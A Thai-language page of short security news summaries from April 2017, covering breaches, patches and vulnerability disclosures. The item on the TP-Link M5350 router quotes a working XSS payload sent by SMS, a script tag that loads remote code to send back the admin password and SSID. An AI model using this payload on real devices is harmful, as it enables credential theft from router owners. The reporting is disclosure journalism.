Security

แอพแชทองค์กร HipChat ถูกแฮ็ก บังคับรีเซ็ตรหัสผ่านของผู้ใช้ทุกคน

By mk

on 25 April 2017 - 11:57 Tag: HipChat, Atlassian, Security, Hacking

HipChat

HipChat บริการแชทภายในทีม (คู่แข่งของ Slack) จากบริษัท Atlassian ผู้พัฒนา Jira/Bitbucket ประกาศพบร่องรอยการถูกแฮ็กเซิร์ฟเวอร์ โดยช่องโหว่มาจากทางไลบรารียอดนิยมที่ HipChat เรียกใช้งานอีกทีหนึ่ง

Atlassian ประกาศยกเลิกรหัสผ่านของผู้ใช้ที่เชื่อมต่อทั้งหมดทันที และบังคับให้ผู้ใช้ต้องรีเซ็ตรหัสผ่านใหม่ บริษัทคาดว่าแฮ็กเกอร์ได้ข้อมูลของผู้ใช้ทุกรายคือ username, email, รหัสผ่านที่ hash แล้ว (bcrypt/salt) และมีข้อมูลการแช็ทบางส่วน (น้อยกว่า 0.05%) ถูกนำออกไปด้วย

Atlassian ยืนยันว่าไม่พบหลักฐานใดๆ ที่บ่งชี้ว่าแอพตัวอื่นของบริษัทได้รับผลกระทบจากการแฮ็กครั้งนี้ด้วย

ชุดแฮกหลุดจาก NSA เริ่มอาละวาดหลังกลุ่มแฮกเกอร์แจกเครื่องมือทั้งหมด เซิร์ฟเวอร์วินโดวส์ติดนับหมื่นเครื่อง

By lew

on 24 April 2017 - 13:26 Tag: NSA, Windows, Security

NSA

กลุ่มแฮกเกอร์ Shadow Broker เคยออกมาขอเงิน 1 ล้านดอลลาร์เพื่อแลกกับชุดเครื่องมือที่น่าจะเป็นของ NSA แต่ปรากฎว่าไม่มีใครยอมจ่ายทำให้ทางกลุ่มปล่อยเครื่องมือออกมาฟรี และตอนนี้ก็เริ่มมีแฮกเกอร์ใช้เครื่องมือเหล่านี้แฮกเครื่องที่ต่ออินเทอร์เน็ตเป็นวงกว้างแล้ว

ธนาคารในบราซิลถูกขโมยโดเมน 5 ชั่วโมง หน้าเว็บถูกปลอมเอารหัสลูกค้า, ติดตั้งมัลแวร์

By lew

on 23 April 2017 - 14:06 Tag: Brazil, Banking, Security

Brazil

การโจมตีธนาคารด้วยการปลอมโดเมนเพื่อหลอกให้ลูกค้าใส่รหัสผ่านคงเป็นเรื่องที่เราพบเจอกันเรื่อยๆ ที่งาน Kaspersky Security Summit ทาง Kaspersky ก็รายงานถึงธนาคารแห่งหนึ่งในบราซิลที่ถูกขโมยโดเมนจริงของธนาคารไปถึง 5 ชั่วโมง ในช่วงวันที่ 22 ตุลาคมปีที่แล้ว

รายงานไม่ระบุชื่อธนาคารแต่ระบุว่าเป็นธนาคารขนาดใหญ่ มีทรัพย์สินรวม 25,000 ล้านดอลลาร์สหรัฐฯ, ลูกค้ากว่า 5 ล้านคน, และจำนวนสาขา 500 สาขา

ออราเคิลปล่อยแพตช์ความปลอดภัยไตรมาสที่สอง รวม 299 ช่องโหว่

By lew

on 21 April 2017 - 21:51 Tag: Oracle, Security, Enterprise

Oracle

ออราเคิลปล่อยแพตช์ประจำไตรมาสที่สองของปี ตามนโยบายการออกแพตช์ปีละสี่รอบของบริษัท โดยรอบนี้มีช่องโหว่ได้รับการแก้ไขรวม 299 รายการ กระจายไปตามรายการซอฟต์แวร์ต่างๆ แต่รายการช่องโหว่ระดับวิกฤติ มักมาจากช่องโหว่ของ Struts 2 หลายสิบรายการ

สำหรับช่องโหว่จาวาที่ร้ายแรงที่สุดเป็น CVE-2017-3512 และ CVE-2017-3514 ในส่วน AWT, ส่วน Solaris มีช่องโหว่ระบบร้ายแรงสูงสุด 1 รายการในส่วน Kernel RPC

MySQL นั้นตัวเซิร์ฟเวอร์มีช่องโหว่คะแนน CVSS สูงสุดที่ 7.7 แต่สำหรับคนใช้รุ่น Enterprise อาจจะต้องระวังกว่าเพราะตัว Monitoring ได้รับผลกระทบจาก Struts 2 ทำให้มีช่องโหว่คะแนน 10.0 อีกหนึ่งรายการ

InterContinental ยอมรับมีโรงแรมในเครือถูกมัลแวร์มากถึง 1,200 แห่ง จากเดิมที่ประกาศไว้ 12 แห่ง

By nutmos

on 20 April 2017 - 22:51 Tag: Security, Data Breach, Hotel, Lifestyle

Security

InterContinental Hotel Group (IHG) ได้ว่าโรงแรมที่ได้รับผลกระทบจากการถูกมัลแวร์ขโมยข้อมูลบัตรเครดิต มีจำนวนถึง 1,200 แห่ง จากรายงานก่อนหน้าที่กล่าวว่ามีเพียง 12 แห่ง ซึ่งเป็นโรงแรมของแบรนด์ในเครือทั้งหมดที่อยู่ในอเมริกา เช่น Holiday Inn, Kimpton, Hotel Indigo ฯลฯ จากโรงแรมในเครือทั้งหมดที่อยู่ในอเมริกากว่า 3,925 แห่ง

เฟซบุ๊กปล่อยเครื่องมือ Delegated Recovery เวอร์ชันเบต้าสำหรับเว็บไซต์อื่นๆ ที่สนใจแล้ว

By nismod

on 19 April 2017 - 13:12 Tag: Security, Facebook

Security

เฟซบุ๊กเปิดตัวบริการ Delegated Recovery ซึ่งเป็นบริการหรือเครื่องมือสำหรับกู้บัญชีผ่านโปรโตคอลของเฟซบุ๊ก แทนการใช้งาน SMS หรืออีเมลในแบบเดิมเมื่อเดือนมกราคมที่ผ่านมา โดยเปิดให้กู้เฉพาะบน Github ก่อนเท่านั้น

ล่าสุดในงาน F8 เฟซบุ๊กประกาศปล่อยทั้ง SDKs, แนวทางและตัวอย่างการใช้งาน ให้กับบริษัทหรือเว็บไซต์ทั่วไปที่สนใจนำไปทดลองใช้งานแล้ว ทั้งภาษา Java และสำหรับแพลตฟอร์ม NodeJS

Chrome จะไม่แสดงโดเมนที่มีตัวอักษรที่คล้ายตัวละติน แก้ปัญหา phishing

By lew

on 19 April 2017 - 11:01 Tag: Chrome, Google, Phishing, Security

Chrome

การเปิดใช้งานตัวอักษร unicode ในโดเมนเปิดทางให้การโจมตี phishing ทำได้แนบเนียนขึ้นเรื่อยๆ ปัญหาสำคัญเช่น อักษรซีริลลิก (Cyrillic) ที่มีตัวอักษรเหมือนกับตัวละตินในภาษาอังกฤษหลายตัว ทำให้สามารถปลอมโดเมนได้อย่างแนบเนียน

Xudong Zheng รายงานปัญหานี้ตั้งแต่สัปดาห์ที่แล้ว ระบุว่าบนเครื่องบางเครื่องที่ฟอนต์ตรงกัน การปลอมโดเมนด้วยอักษรซีริลลิก ทำให้ผู้ใช้ไม่สามารถแยกระหว่างโดเมนจริงกับโดเมนปลอมได้เลย

Magento มีช่องโหว่รันโค้ดจากภายนอก เวอร์ชั่นล่าสุดยังไม่แก้ไข

By lew

on 18 April 2017 - 08:20 Tag: Magento, Security

Magento

Defense Code รายงานช่องโหว่ของระบบอีคอมเมิร์ช Magento ที่ได้รับความนิยมเป็นอย่างสูงรวมถึงในบ้านเราเอง โดยระบบพรีวิววิดีโอจาก Vimeo จะดาวน์โหลดภาพสินค้าตัวอย่างเสมอ และแม้ว่าตัวซอฟต์แวร์จะตรวจสอบไฟล์ที่กำลังดาวน์โหลดว่าเป็นภาพจริงหรือไม่ แต่ก็ดาวน์โหลดไฟล์เสมอแม้จะผิดพลาดก็ตามทำให้แฮกเกอร์ทำโค้ดไปวางบนเซิร์ฟเวอร์ของเหยื่อได้

Airbnb เปิดใช้การยืนยันตัวตนหลายขั้นตอนแล้ว, ส่ง SMS ให้ตอนใช้เครื่องใหม่ครั้งแรก

By lew

on 17 April 2017 - 19:25 Tag: Airbnb, Security

Airbnb

Airbnb เจอปัญหาผู้ใช้ถูกขโมยบัญชีมากขึ้นเรื่อยๆ ในช่วงหลัง หลังจากที่พยายามทำระบบตรวจจับความเสี่ยงภายใน ตอนนี้ทาง Airbnb ก็หันมาใช้การยืนยันตัวตนหลายขั้นตอนด้วย SMS แล้ว

การส่ง SMS ของ Airbnb จะไม่ส่งบ่อยๆ เหมือนการทำธุรกรรมธนาคารที่เราพบกัน แต่จะจำไว้ว่าเราเคยใช้อุปกรณ์ใดล็อกอินเข้าแอปบ้าง หากเป็นอุปกรณ์ใหม่ก็จะส่งรหัสทาง SMS หรืออีเมล หลังจากนั้นจะสามารถล็อกอินด้วยอุปกรณ์เดิมต่อไปได้เรื่อยๆ

ที่มา - Airbnb

นักวิจัยรายงานช่องโหว่ 3G Router, ดึงรหัสแอดมินได้ผ่าน SMS

By lew

on 17 April 2017 - 13:36 Tag: Security, TP-Link

Security

Jan Hörsch จากบริษัท Securai รายงานช่องโหว่ของเราท์เตอร์ 3G ของ TP-Link รุ่น M5350 ที่มีช่องโหว่ cross-site scripting (XSS) เปิดทางให้แฮกเกอร์สามารถยิงโค้ดจาวาสคริปต์ขึ้นไปรันได้

นักวิจัยทดสอบด้วยการยิง SMS <script src=//n.ms/a.j></script> เพื่อให้เราท์เตอร์นำโค้ดขึ้นไปรัน จากนั้นตัวสตริปต์จะส่ง SMS กลับมาเป็นรหัสผ่านและ SSID ของตัวเราท์เตอร์

HPE เปิดตัว HPE SecureData with Hyper FPE ชุดเข้ารหัสรักษาฟอร์แมตข้อมูล ที่ได้รับการรับรองจาก NIST เป็นรายแรก

By lew

on 17 April 2017 - 11:57 Tag: HPE, Security, NIST, Cryptography

HPE

NIST เปิดตัวมาตรการการเข้ารหัสแบบรักษาฟอร์แมตข้อมูล (Format-Preserving Encryption - FPE) มาตั้งแต่ปีที่แล้ว ตอนนี้ทาง HPE ประกาศว่าโซลูชั่น SecureData ของบริษัทเป็นโซลูชั่นแรกที่ได้รับการรับรอง (validated) ตามมาตรฐานนี้

HPE SecureData with Hyper FPE ใช้กระบวนวิธีเข้ารหัสแบบ AES-FF1 เป็นหนึ่งในสามกระบวนวิธีที่มาตรฐานของ NIST รับรองให้ใช้งาน

กูเกิลศึกษาพฤติกรรมมัลแวร์ Android กว่า 50,000 ตัวอย่าง เพื่ออุดช่องโหว่ความปลอดภัย

By mk

on 16 April 2017 - 13:26 Tag: Android, Google, Malware, Ransomware, Security

Android

Elena Kovakina พนักงานในทีมความปลอดภัย Android ของกูเกิล ไปพูดที่งานสัมมนาของ Kaspersky เล่าว่ากูเกิลเก็บรวบรวม ransomware บน Android กว่า 50,000 ตัวอย่าง (คิดเป็น 30 ตระกูลมัลแวร์) เพื่อนำไปศึกษาพฤติกรรมของมันว่าทำงานอย่างไร

สิ่งที่กูเกิลสนใจคือ ransomware เหล่านี้มีพฤติกรรมอย่างไร เจาะเข้ามาทาง API ตัวไหน เพื่อว่ากูเกิลจะได้อุดช่องโหว่เหล่านั้น และที่ผ่านมา ระบบความปลอดภัยของ Android ก็พัฒนาขึ้นเพราะการศึกษามัลแวร์เหล่านี้ด้วย

Netflix ออกชุดทดสอบ BetterTLS ช่วยให้เบราว์เซอร์รองรับ CA แบบจำกัดโดเมนได้ดีขึ้น

By lew

on 14 April 2017 - 23:29 Tag: Security, HTTPS, Netflix

Security

ระบบการออกใบรับรองการเข้ารหัสเว็บทุกวันนี้ ความน่ากลัวอย่างหนึ่งคือเมื่อมี root CA เพิ่มเข้ามาแล้ว root CA นั้นจะออกใบรับรองให้กับโดเมนใดๆ ก็ได้ ทั้งที่จริงๆ แล้วฟีเจอร์หนึ่งของใบรับรองสำหรับ CA คือ Name Constraints สามารถกำหนดโดเมนที่ CA จะออกโดเมนได้แต่ก็ไม่มีใครสนใจใช้งานจริงจังนัก

SWIFT ระบบส่งข้อความระหว่างธนาคาร เตรียมเพิ่มระบบตรวจจับข้อความหลอกลวงป้องกันเงินหาย

By nutmos

on 13 April 2017 - 07:22 Tag: SWIFT Messaging, Banking, Security

SWIFT Messaging

SWIFT ผู้ให้บริการระบบส่งข้อความระหว่างธนาคาร ซึ่งปัจจุบันระบบนี้ถูกใช้เพื่อโอนเงินนับล้านล้านดอลลาร์ต่อวัน เตรียมเปิดตัวเครื่องมือใหม่เพื่อตรวจจับข้อความหลอกลวง เพื่อเรียกคืนความเชื่อมั่น หลังจากที่มีข่าวธนาคารถูกโจมตีผ่านระบบและเงินหายไปนับล้านดอลลาร์

ระบบใหม่ของ SWIFT จะมีการเรียนรู้แพทเทิร์นการส่งข้อความของธนาคารผู้ใช้งานระบบดังกล่าว ดังนั้นตัวระบบสามารถตรวจจับได้ทันทีเมื่อพบเห็นสิ่งที่ผิดปกติ

Project Zero รายงานปัญหาความปลอดภัยไดร์เวอร์ Broadcom Wi-Fi SoC, เจาะทะลุจาก Wi-Fi เข้าเคอร์เนล

By lew

on 12 April 2017 - 09:01 Tag: Project Zero, Google, Nexus, Security, iOS

Project Zero

Project Zero ของกูเกิลเขียนรายงานการเจาะเฟิร์มแวร์ Broadcom Wi-Fi SoC ที่ใช้งานอยู่ใน Nexus 6P แสดงให้เห็นว่าแฮกเกอร์สามารถแฮกเครื่องจากระยะไกล ด้วยการสร้างแพ็กเก็ต Wi-Fi เพื่อเจาะทะลุตัวเฟิร์มแวร์ เมื่อควบคุมตัวเฟิร์มแวร์ของชิป Wi-Fi ได้แล้วจึงเจาะทะลุเข้าเคอร์เนลอีกชั้นหนึ่ง ทำให้เข้าควบคุมเครื่องของเหยื่อได้อย่างสมบูรณ์

ช่องโหว่นี้ถูกแก้ไขแล้วในอัพเดตเดือนเมษายนที่ผ่านมา (สำหรับ Nexus ที่ยังซัพพอร์ตอยู่เท่านั้น)

Wonga ผู้ให้บริการกู้เงินระยะสั้นถูกแฮกเว็บไซต์ กระทบผู้ใช้เกือบ 3 แสนคน

By nutmos

on 10 April 2017 - 16:58 Tag: Wonga, Data Breach, Security

Wonga

Wonga ผู้ให้บริการกู้เงินระยะสั้นได้ประกาศว่า ทางบริษัทถูกแฮกเว็บไซต์และพบว่ามีข้อมูลที่รั่วไหลออกมาเป็นจำนวนมาก กระทบกับผู้ใช้กว่า 245,000 คนในสหราชอาณาจักร และ 25,000 คนในโปแลนด์ ซึ่งตอนนี้ได้ส่งอีเมลแจ้งเตือนผู้ใช้ที่มีความเสี่ยงที่จะถูกขโมยข้อมูล รวมถึงขึ้นข้อมูลในเว็บไซต์เพื่อประกาศการถูกแฮกข้อมูลแล้ว

ระบบเตือนภัยทอร์นาโดเมืองดัลลัสถูกแฮก ไซเรนดังทั้งเมืองสองชั่วโมง

By lew

on 10 April 2017 - 06:23 Tag: USA, Security

USA

ความปลอดภัยไซเบอร์เริ่มเข้าไปเกี่ยวข้องกับระบบควบคุมมากขึ้นเรื่อยๆ เช่น ระบบควบคุมโครงการพื้นฐานอย่างไฟฟ้าและประปา ล่าสุดการระบบเตือนภัยเมืองดัลลัสก็ตกเป็นเหยื่อของการบุกรุกไซเบอร์ เมื่อระบบถูกแฮกจนไซเรน 156 ตัวสำหรับการแจ้งเตือนทอร์นาโดดังขึ้นพร้อมกันทั่วเมือง

ทางโฆษกระบุว่ายังไม่สามารถให้รายละเอียดได้ แต่บอกเพียงว่าระบบถูกแฮกตั้งแต่วันศุกร์ที่ผ่านมา และกำลังทำงานร่วมกับหน่วยงานอื่น เช่น FCC เพื่อหาต้นตอของการบุกรุกต่อไป

รายงานสำรวจ HTTPS ไทยปี 2017 - เว็บข่าว-หน่วยงานรัฐ ยังไม่นิยม HTTPS

By neizod

on 5 April 2017 - 10:27 Tag: Special Report, Security, Internet, Thailand, SSL, HTTPS

Special Report

หลังจาก Blognone เคยนำเสนอรายงานสำรวจการเปิดใช้งาน HTTPS ในไทย ประจำปีปี 2016 ไป ขณะนี้ผ่านมาหนึ่งปีกว่าๆ แล้ว ก็สมควรถึงเวลาที่จะสำรวจติดตามผลกันอีกครั้ง

รอบนี้เราขยายจำนวนเว็บที่สนใจให้มากขึ้นกว่าเดิม แต่ยังคงตามติดเว็บเดิมที่เคยสำรวจไว้อย่างครบถ้วนครับ

McAfee แยกตัวจากอินเทลเสร็จแล้ว เปลี่ยนโลโก้ใหม่สอดรับยุคสมัยใหม่

By mk

on 4 April 2017 - 22:06 Tag: McAfee, Intel, Security, Enterprise

McAfee

เมื่อเดือนกันยายนปีที่แล้ว อินเทลประกาศขายหุ้น 51% ใน Intel Security ให้กับบริษัทลงทุน TPG ส่งผลให้ Intel Security หรือ McAfee เดิม ไม่ได้มีสถานะเป็นบริษัทลูกของอินเทลอีกต่อไป (แต่อินเทลยังถือหุ้นอยู่ 49%)

วันนี้กระบวนการเปลี่ยนผ่านเสร็จสิ้นแล้ว ส่งผลให้ McAfee กลับมาเกิดใหม่อีกครั้งในฐานะบริษัทอิสระ (standalone company) โดยมีชื่ออย่างเป็นทางการว่า McAfee, LLC

ผลิตภัณฑ์และบริการทั้งหมดของ McAfee ยังเหมือนเดิม สิ่งที่ต่างไปคือโลโก้ใหม่ ยังเป็นรูปโล่สีแดงคล้ายของเดิม แต่เปลี่ยนจากโล่ทรงโค้งมีโลโก้รูปตัว M มาเป็นโล่ทรงเหลี่ยมที่ดูเป็นอักษร M แทน

ภัยไซเบอร์ตัวใหม่ ปัญหาเจาะระบบเพื่อเอาข้อมูล (Data Breach) เติบโตถึง 566% ในปี 2016

By mk

on 4 April 2017 - 19:09 Tag: IBM, Security, Data Breach

IBM

IBM Security ออกรายงานสรุปสถานการณ์ความปลอดภัยของปี 2016 ผลพบว่าการเติบโตของข้อมูลหลุด (data breach) เพิ่มสูงเป็นประวัติการณ์ จำนวนข้อมูลที่ถูกเจาะออกมาเผยแพร่เพิ่มจาก 600 ล้านรายการในปี 2015 มาเป็น 4 พันล้านรายการในปี 2016 (โตถึง 566% ภายในปีเดียว)

ข้อมูลที่ถูกเจาะมีทั้งข้อมูลแบบเดิมๆ อย่างรหัสผ่าน เลขบัตรเครดิต ข้อมูลสุขภาพ แต่อาชญากรไซเบอร์ก็หันมาเจาะข้อมูลประเภทใหม่ๆ เช่น บันทึกอีเมลเก่าๆ เอกสารทางธุรกิจ ทรัพย์สินทางปัญญา และซอร์สโค้ดของซอฟต์แวร์ที่ใช้ภายในองค์กรด้วย

Subscribe to Security